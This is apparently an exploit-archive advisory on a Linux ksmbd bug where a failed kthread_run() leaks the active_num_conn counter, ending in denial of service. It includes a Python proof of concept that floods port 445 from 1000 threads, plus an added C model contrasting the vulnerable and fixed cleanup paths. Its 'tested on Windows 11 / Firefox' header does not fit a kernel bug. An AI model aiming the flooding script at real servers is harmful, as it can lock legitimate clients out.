=============================================================================================================================================
| # Title : Linux Kernel 5.x ksmbd: active_num_conn Counter Leak via kthread_run() Failure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : System built-in component |
=============================================================================================================================================

[+] Summary :

A vulnerability in the Linux kernel's ksmbd component caused a resource accounting error when handling new TCP connections. Within ksmbd_tcp_new_connection(), the internal counter active_num_conn was incremented when a new connection was initiated. If kthread_run() then failed to create the connection handler thread, the error path called free_transport(), which released the transport but did not decrement active_num_conn. Each such failed attempt therefore leaked one count, artificially inflating the number of connections the server believed were active.

Because active_num_conn is what ksmbd compares against its connection limit, a sufficiently inflated counter causes the server to reject legitimate clients even when no real connections exist, a Denial of Service (DoS) condition. The counter is never corrected without a restart of the service, so the effect accumulates over time.

The issue was resolved by replacing the free_transport() call on that error path with ksmbd_tcp_disconnect(), which decrements active_num_conn as part of its cleanup and restores correct accounting.

Note that only attempts on which kthread_run() actually fails (for example under memory or thread-creation pressure) leak a count. The stress script below drives rapid connection churn to exercise that path repeatedly; it does not by itself guarantee that kthread_run() fails.

Affected kernel versions: 5.x, 6.1.x, 6.5.x, 6.6.0-6.6.124

[+] POC :

import socket
import threading
import time

TARGET_IP = "192.168.1.100"   # ksmbd server under test
TARGET_PORT = 445             # SMB over TCP
MAX_THREADS = 1000            # number of concurrent connection workers


def stress_worker():
    """
    Worker function to flood the target with rapid connection/disconnection cycles.
    Every cycle drives ksmbd_tcp_new_connection(); an attempt on which kthread_run()
    fails leaves active_num_conn incremented.
    """
    while True:
        try:
            # 'with' guarantees the socket is closed even if connect()/send() raise,
            # so the client side does not leak file descriptors during a long run
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                s.settimeout(1)
                s.connect((TARGET_IP, TARGET_PORT))
                s.send(b"\x00")   # minimal byte so the server sees traffic before teardown
        except socket.error:
            # connection refused / timed out: back off briefly and retry
            time.sleep(0.01)
        except Exception:
            pass


def monitor_and_launch():
    """
    Initializes and monitors the thread pool.
    """
    print(f"[*] Starting stress test on {TARGET_IP}:{TARGET_PORT}...")
    threads = []
    for i in range(MAX_THREADS):
        t = threading.Thread(target=stress_worker)
        t.daemon = True       # workers die with the main thread on Ctrl-C
        t.start()
        threads.append(t)
        if i % 100 == 0:
            print(f"[+] Launched {i} threads...")
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Stress test stopped by user.")


if __name__ == "__main__":
    monitor_and_launch()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
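The accounting defect described in the summary, as an added userland C model written for this page rather than ksmbd's own source. It keeps the names the advisory uses (active_num_conn, free_transport(), ksmbd_tcp_disconnect()) and simplifies everything else: model_kthread_run(), new_connection(), run_scenario(), healthy_client_accepted() and the connection cap of 3 are assumptions made here so the leak can be demonstrated without a kernel. The vulnerable path (free_transport() after a failed thread start) and the fixed path (ksmbd_tcp_disconnect()) are selected by a flag so both can be run side by side.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

/* Added illustration, not ksmbd code. The counter and the two cleanup
 * routines carry the advisory's names; the rest is a simplified stand-in. */

static int active_num_conn;          /* connections the server believes are live */
static int max_connections = 3;      /* assumed cap, mirrors ksmbd's connection limit */
static int kthread_should_fail;      /* test knob: make the next kthread_run() fail */

struct tcp_transport {
    int sock;
    bool handler_started;
};

/* Stand-in for kthread_run(): 0 on success, negative when thread creation fails. */
static int model_kthread_run(struct tcp_transport *t)
{
    if (kthread_should_fail)
        return -12;                  /* -ENOMEM-style failure */
    t->handler_started = true;
    return 0;
}

/* Vulnerable cleanup: releases the transport but touches no accounting. */
static void free_transport(struct tcp_transport *t)
{
    free(t);
}

/* Fixed cleanup: undoes the increment taken at connection start, then frees. */
static void ksmbd_tcp_disconnect(struct tcp_transport *t)
{
    active_num_conn--;
    free_transport(t);
}

/* Model of ksmbd_tcp_new_connection().
 * Returns 0 when accepted, -1 when rejected by the cap, -2 on thread failure. */
static int new_connection(int sock, bool fixed)
{
    if (active_num_conn >= max_connections)
        return -1;                   /* "too many connections" rejection */

    active_num_conn++;               /* the increment the error path must undo */

    struct tcp_transport *t = calloc(1, sizeof *t);
    if (!t) {
        active_num_conn--;
        return -2;
    }
    t->sock = sock;

    if (model_kthread_run(t) < 0) {
        if (fixed)
            ksmbd_tcp_disconnect(t); /* patched path: counter returns to balance */
        else
            free_transport(t);       /* original path: counter stays inflated */
        return -2;
    }

    /* A healthy connection's normal teardown also goes through the decrementing path. */
    ksmbd_tcp_disconnect(t);
    return 0;
}

/* Drive failing_attempts connection attempts that all hit the kthread failure path.
 * Returns active_num_conn afterwards: the number of leaked counts. */
static int run_scenario(bool fixed, int failing_attempts)
{
    active_num_conn = 0;
    kthread_should_fail = 1;
    for (int i = 0; i < failing_attempts; i++)
        new_connection(1000 + i, fixed);
    kthread_should_fail = 0;
    return active_num_conn;
}

/* After the failing attempts, can a well-behaved client still get in? */
static bool healthy_client_accepted(bool fixed, int failing_attempts)
{
    run_scenario(fixed, failing_attempts);
    return new_connection(1, fixed) == 0;
}

int main(void)
{
    printf("vulnerable: leaked=%d healthy client accepted=%d\n",
           run_scenario(false, 3), healthy_client_accepted(false, 3));
    printf("fixed:      leaked=%d healthy client accepted=%d\n",
           run_scenario(true, 3), healthy_client_accepted(true, 3));
    return 0;
}
```

With the cap set to 3, three failed thread starts on the vulnerable path leave active_num_conn at 3 with no real connection alive, and the next legitimate client is refused; on the fixed path the counter returns to 0 after each failure and the client is accepted. The same check is what a regression test for the real fix would assert: after N forced kthread_run() failures, the active connection count must still be 0.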